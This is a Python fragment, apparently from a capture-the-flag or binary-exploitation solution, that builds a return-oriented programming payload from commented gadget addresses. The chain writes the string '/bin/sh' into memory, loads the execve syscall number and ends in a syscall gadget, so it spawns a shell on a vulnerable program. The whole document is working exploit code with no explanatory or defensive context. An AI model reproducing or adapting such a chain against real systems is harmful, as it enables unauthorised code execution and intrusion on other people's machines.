payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x426048)+p64(0x40256c)
# 0x000000000040256c: pop rsi; pop rbp; ret; 
payload += p64(0x68662f6e69622f)+p64(0x0)+p64(0x402792)
# 0x0000000000402792: mov qword ptr [rdi + 0x28], rsi; xor eax, eax; pop rbp; ret; 
payload += p64(0x0)+p64(0x402425)
# 0x0000000000402425: pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x402535)+p64(0x4115b3)
# 0x00000000004115b3: mov eax, edi; pop rbp; ret; 
payload += p64(0x0)+p64(0x40e38c)
# 0x000000000040e38c: mov rdx, rbx; mov r8, r12; call rax; 
payload += b''
# 0x0000000000402535: pop rdi; pop rbp; ret; 
payload += p64(0x0)+p64(0x40256c)
# 0x000000000040256c: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3b)+p64(0x4115b3)
# 0x00000000004115b3: mov eax, edi; pop rbp; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x426070)+p64(0x409965)
# 0x0000000000409965: syscall; 
payload += b''
